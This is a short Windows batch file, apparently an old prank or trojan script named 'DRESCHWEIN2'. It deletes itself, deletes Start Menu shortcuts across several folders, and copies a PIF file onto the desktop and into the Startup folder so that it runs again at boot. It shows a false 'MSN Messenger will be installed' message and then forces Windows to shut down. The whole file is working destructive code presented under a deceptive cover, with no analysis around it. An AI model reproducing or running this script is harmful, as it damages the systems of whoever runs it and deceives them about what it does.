@ECHO OFF 
CD..
C:\
ECHO                         D R E S C H W E I N2
@ECHO OFF
DEL C:\DOC.BAT
C:\PROGRA~1\INTERN~1\IEXPLORE.EXE http://nohack.com
ECHO	SOLUTION - Please Reinstall your version od windows
@ECHO OFF
DEL C:\WINDOZE\STARTM~1\*.LNK
DEL C:\WINDOZE\STARTM~1\PROGRAMS\ACCESS~1\SYSTEM~1\*.LNK
DEL C:\WINDOZE\STARTM~1\PROGRAMS\ACCESS~1\*.LNK
DEL C:\WINDOZE\STARTM~1\PROGRAMS\ACCESS~1\ENTERT~1\*.LNK
COPY C:\D2\DRES2.PIF C:\WINDOZE\DESKTOP
ECHO german
=GERMAN....
@ECHO OFF
COPY C:\D2\Dres2.PIF C:\WINDOZE\STARTM~1\PROGRAMS\STARTUP
ECHO GERMANINFLUENCE=GERMAN...
@ECHO OFF
copy c:\d2\SYS\biz.mpg c:\windoze\STARTM~1
ECHO MSN MESSENGER WILL BE INSTALLED IN A MOMENT
@ECHO OFF
C:\WiNdOzE\rUnDlL.ExE uSeR.ExE,eXiTwInDoWs
echo.
C:\WiNdOzE\rUnDlL.ExE uSeR.ExE,eXiTwInDoWs
$ 